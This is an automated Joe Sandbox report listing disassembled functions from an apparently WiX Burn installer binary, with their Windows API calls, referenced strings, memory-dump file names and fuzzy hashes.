Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b68f39fcee1b028a3fe2e629bcfc11b47f71d727765a013fba897e686790cd94
Instruction ID: 772ccac6ed97aa350cf38101e790b4d23a9981d990d7aa7cfe0d251074f84861
Opcode Fuzzy Hash: b68f39fcee1b028a3fe2e629bcfc11b47f71d727765a013fba897e686790cd94
Instruction Fuzzy Hash: 92F09D70C2620DEBCB00DBF4D949A9EBBF8EF08301F52489AA415E7110E734AB44AB61

Function 009D0C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 009D0DD7

Strings

regutil.cpp, xrefs: 009D0DC4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: regutil.cpp
API String ID: 3535843008-955085611
Opcode ID: 907367d8e77ffe20314a02b7739340c3fb0352afd0b8e591fdff6c4abfae7795
Instruction ID: 163db0fc3e09aa7eb3ee2064b44c347b2809818dd9a26275435d9d9f3e48a1de
Opcode Fuzzy Hash: 907367d8e77ffe20314a02b7739340c3fb0352afd0b8e591fdff6c4abfae7795
Instruction Fuzzy Hash: 1741B532D81329EBDB318EE4CC047AD7A66ABC4720F25C167F954AB390D7349D8097D4

Function 009D479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 009D48FC

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 009D47AC
PendingFileRenameOperations, xrefs: 009D47EC, 009D48D4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-3023217399
Opcode ID: f1e1dfe2a72f1040a58c3a423228ed28653e4498c8fb7e909f1ec15a99d3f0ce
Instruction ID: 817b9769bd69d77b61d01cbd9e30573eca637c053ccae3080bc9236a5a40a5ef
Opcode Fuzzy Hash: f1e1dfe2a72f1040a58c3a423228ed28653e4498c8fb7e909f1ec15a99d3f0ce
Instruction Fuzzy Hash: 32418275E80259EFCF20DF98C941AAEBBB9EF44B90F25806BE504A7311D7719E40EB50

Function 009D10B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009D112B
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009D1163

Strings

regutil.cpp, xrefs: 009D11A9

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: f65c48725d35f99891f35bbdab8cab0b707ac22b69023f343793956f2242f303
Instruction ID: cabbaa26e3bcec7a846530f6b5e91e40a546ff40a5b0ea7bcdc13bbcabe600b2
Opcode Fuzzy Hash: f65c48725d35f99891f35bbdab8cab0b707ac22b69023f343793956f2242f303
Instruction Fuzzy Hash: C7418C77D4412ABBDB209F98CC41AAEBBBAFF44350F10856AEA11A7350D7319E109B90

Function 009C66D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(009DB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 009C67A3
GetLastError.KERNEL32 ref: 009C67BF

Strings

comres.dll, xrefs: 009C674A, 009C6798, 009C67D4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: comres.dll
API String ID: 203985260-246242247
Opcode ID: 55b7b4778142de462f16a4e48b72afd2e24696899c36f64f569e98e095edc5ea
Instruction ID: 5a0f6abc4cec722397d65256f3a76f0516e4e03936b01fba2fc4dd1305877f9f
Opcode Fuzzy Hash: 55b7b4778142de462f16a4e48b72afd2e24696899c36f64f569e98e095edc5ea
Instruction Fuzzy Hash: 8531E331E00315ABCB21AF58CA85FAB7BAC9F85764F14486DF9149B191EB70CE00C7A3

Function 009D8F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D8E44: lstrlenW.KERNEL32(00000100,?,?,?,009D9217,000002C0,00000100,00000100,00000100,?,?,?,009B7D87,?,?,000001BC), ref: 009D8E69

RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,009DB500,wininet.dll,?), ref: 009D907A
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,009DB500,wininet.dll,?), ref: 009D9087

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

Part of subcall function 009D0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,009B8E1B), ref: 009D0EAA
Part of subcall function 009D0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009B8E1B,00000000), ref: 009D0EC8

Strings

wininet.dll, xrefs: 009D8FEF, 009D903C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Close$EnumInfoOpenQuerylstrlen
String ID: wininet.dll
API String ID: 2680864210-3354682871
Opcode ID: f171b7cb9423815e2fb8440d3949bdf6f0f4eed3182488d7d5ad2d85731b4bc2
Instruction ID: df3724b0e72fe82a79bae5d30e86177b9314cc4b26208762a954f962709c32fe
Opcode Fuzzy Hash: f171b7cb9423815e2fb8440d3949bdf6f0f4eed3182488d7d5ad2d85731b4bc2
Instruction Fuzzy Hash: 60311772C4112DEBCF21BFA8D9809AEBB79EF44750F55817AEA1476221C7318E50EB90

Function 009D939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D8E44: lstrlenW.KERNEL32(00000100,?,?,?,009D9217,000002C0,00000100,00000100,00000100,?,?,?,009B7D87,?,?,000001BC), ref: 009D8E69

RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 009D9483
RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 009D949D

Part of subcall function 009D0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,009A061A,?,00000000,00020006), ref: 009D0C0E

Part of subcall function 009D14F4: RegSetValueExW.ADVAPI32(00020006,009E0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0099F335,00000000,?,00020006), ref: 009D1527

Part of subcall function 009D14F4: RegDeleteValueW.ADVAPI32(00020006,009E0D10,00000000,?,?,0099F335,00000000,?,00020006,?,009E0D10,00020006,00000000,?,?,?), ref: 009D1557

Part of subcall function 009D14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0099F28D,009E0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009D14BB

Strings

%ls\%ls, xrefs: 009D93FF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: 7d8b03bc00cc71bb05a9bbe30c026a78a4835bf077b216b0b2d9a61fd291e1f8
Instruction ID: b182cdb0d94ce168821d92a285dec9405161670db9755dfc66387f4a8006fa23
Opcode Fuzzy Hash: 7d8b03bc00cc71bb05a9bbe30c026a78a4835bf077b216b0b2d9a61fd291e1f8
Instruction Fuzzy Hash: 89312A72C4112EBF8F12AFD5CC819AEBBB9EF44350B458167FA1476222D7318E11EB90

Function 00993A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00993AB0

Strings

crypt32.dll, xrefs: 00993A6D, 00993AAC, 00993AAE
wininet.dll, xrefs: 00993A6E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: _memcpy_s
String ID: crypt32.dll$wininet.dll
API String ID: 2001391462-82500532
Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction ID: 2d2cb25cbaf988b312f5034cd8af1d95a4edef1b98156f1310ba9a8cda86919b
Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction Fuzzy Hash: F7115E71601219ABCF18DE59CD95AAFBF6DEF94394B14802AFC058B311D271EA10CAE0

Function 009D14F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,009E0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0099F335,00000000,?,00020006), ref: 009D1527
RegDeleteValueW.ADVAPI32(00020006,009E0D10,00000000,?,?,0099F335,00000000,?,00020006,?,009E0D10,00020006,00000000,?,?,?), ref: 009D1557

Strings

regutil.cpp, xrefs: 009D158B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: 8208657f552b7cc920ecabe930bd97ac4370aa518140c1e63030699ec9a9ccaf
Instruction ID: 0168398fe722bfa5a51e3b51e51cec6ccd7d906ee98b761713f06523af015a5f
Opcode Fuzzy Hash: 8208657f552b7cc920ecabe930bd97ac4370aa518140c1e63030699ec9a9ccaf
Instruction Fuzzy Hash: 1F11A73799513AB7DF214E94AC05BAA7618AB447B0F158227BD02AA350D639CD1097E0

Function 0099DDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,009B7691,00000000,IGNOREDEPENDENCIES,00000000,?,009DB518), ref: 0099DE04

Strings

Failed to copy the property value., xrefs: 0099DE38
IGNOREDEPENDENCIES, xrefs: 0099DDBB

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: 9853fed9ace9fda453ebb6c346ef250e0b1501eb81214e8a3293aed941f845c6
Instruction ID: b85b326b50e978c6057086466cc5e384bcd264d708eb9d8c4b09491f0ce3b828
Opcode Fuzzy Hash: 9853fed9ace9fda453ebb6c346ef250e0b1501eb81214e8a3293aed941f845c6
Instruction Fuzzy Hash: 9611C632205215AFDF115F9DDCC4FAA77A6AF98320F264179FA189F2D1C770A850C790

Function 009D563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,009A8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 009D566E
SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009A8E97,?), ref: 009D5689

Strings

aclutil.cpp, xrefs: 009D56AD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: 48fa43a45a12b1df0dc3a56923bc7484dba3c274f7a862cc41b75c24d09c8680
Instruction ID: 29c4d28b22307227d007eec4a44434ff2b9d4c591f6af9779731f7dad9f459eb
Opcode Fuzzy Hash: 48fa43a45a12b1df0dc3a56923bc7484dba3c274f7a862cc41b75c24d09c8680
Instruction Fuzzy Hash: B8015E37841529BBCF229F89CD05E9E7F69EF84B50F478156BE0466220C632CD60ABD0

Function 0099158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,00000000,009A70E8,00000000,009A70E8,00000000,00000000,009A70E8,00000000,00000000,00000000,?,00992318,00000000,00000000), ref: 009915D0
GetLastError.KERNEL32(?,00992318,00000000,00000000,009A70E8,00000200,?,009D52B2,00000000,009A70E8,00000000,009A70E8,00000000,00000000,00000000), ref: 009915DA

Strings

strutil.cpp, xrefs: 009915FE

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: 2261e377113c05f39277cc57a61005602e88b873fe85f09ec459bf8e55fdeb7e
Instruction ID: ba5289b93e3e1513a6352f1d058317f5f6ff3847df1dc56981f2e6098d5995fd
Opcode Fuzzy Hash: 2261e377113c05f39277cc57a61005602e88b873fe85f09ec459bf8e55fdeb7e
Instruction Fuzzy Hash: 25019E3394223AB78F218E9E8C44E5B7A6CFF85B60B064225FE10AB250D620DC1087E1

Function 009A57BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 009A57D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 009A5833

Strings

Failed to initialize COM on cache thread., xrefs: 009A57E5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: 5c1666158ccefc6ca6422a2c48ee9e5adef4972c8a8e6b636a34ccdf368b64a2
Instruction ID: 1ea2bd993499b4580f511a73068be32d88ed5c251069a973cba2ceed5513e801
Opcode Fuzzy Hash: 5c1666158ccefc6ca6422a2c48ee9e5adef4972c8a8e6b636a34ccdf368b64a2
Instruction Fuzzy Hash: 1D01AD72201619BFCB018FA8D880EDAFBACFF48354B018126FA08C7220CB30AD54DBD0

Function 009D3BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,009D3A8E,?), ref: 009D3C62

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 009D3C0C
EnableLUA, xrefs: 009D3C34

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 47109696-3551287084
Opcode ID: a4f8032b039654c37d685f7e397cc0bd818337fe967196f23d5d96314667a720
Instruction ID: d48769c32dffcba63205d9a534a17608d0a1521aa2177a81600bb596928e0616
Opcode Fuzzy Hash: a4f8032b039654c37d685f7e397cc0bd818337fe967196f23d5d96314667a720
Instruction Fuzzy Hash: 590171329A1228FBD720AAB4C906BAEF6BCDB54722F21C1A6AD40B3211D3755E5097D1

Function 00995123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00991104,?,?,00000000), ref: 00995142
CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00991104,?,?,00000000), ref: 00995172

Strings

burn.clean.room, xrefs: 0099512F, 0099513C, 00995169

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 381a1caaf5a8e98935a10e936126626fc55174750653374e058d97a2ddd71985
Instruction ID: 52dec8162bee8ffb4c219efa8151759b7fd9bf2c7c0e70696f920a9bf44c1555
Opcode Fuzzy Hash: 381a1caaf5a8e98935a10e936126626fc55174750653374e058d97a2ddd71985
Instruction Fuzzy Hash: 3F0186B251C624AF9B314B4C9D84E73B7BDE715760B114117F909C3620D370DC55D7A1

Function 009D6920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 009D6985

Strings

`5w, xrefs: 009D6985
atomutil.cpp, xrefs: 009D6941

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeString
String ID: `5w$atomutil.cpp
API String ID: 3341692771-1718187286
Opcode ID: 7861dcbb4ca1afa3414f394406d58aa4d7786fd0755206cfd894b65d570656cc
Instruction ID: 88f974c1d6b2317d8eba3b685f44e80374c731b6e2f990d0bcf19347a1f4baa6
Opcode Fuzzy Hash: 7861dcbb4ca1afa3414f394406d58aa4d7786fd0755206cfd894b65d570656cc
Instruction Fuzzy Hash: C701F43A884118FBCB215A999C11BAEF77CAF84B61F25C157F90067350C7769E00E7E4

Function 00996522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 00996534

Part of subcall function 009D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00995EB2,00000000), ref: 009D0AE0
Part of subcall function 009D0ACC: GetProcAddress.KERNEL32(00000000), ref: 009D0AE7
Part of subcall function 009D0ACC: GetLastError.KERNEL32(?,?,?,00995EB2,00000000), ref: 009D0AFE

Part of subcall function 00995CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00995D68

Strings

Failed to set variant value., xrefs: 00996571
Failed to get 64-bit folder., xrefs: 00996557

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: 775bfc0102be4c9702c1f94dddff4a739b834857a361a8506a73f5e8d45873d3
Instruction ID: f9faa98b89294b1ef3e87d6162f64fc62fb8796c814d3c3c05dffb8154777b51
Opcode Fuzzy Hash: 775bfc0102be4c9702c1f94dddff4a739b834857a361a8506a73f5e8d45873d3
Instruction Fuzzy Hash: E001A232C42228BBCF21ABD4CD06A9E7B3CEF40720F528157F800A6144D6319F50D7C1

Function 009933C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009910DD,?,00000000), ref: 009933E8
GetLastError.KERNEL32(?,?,?,?,009910DD,?,00000000), ref: 009933FF

Strings

pathutil.cpp, xrefs: 00993423

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

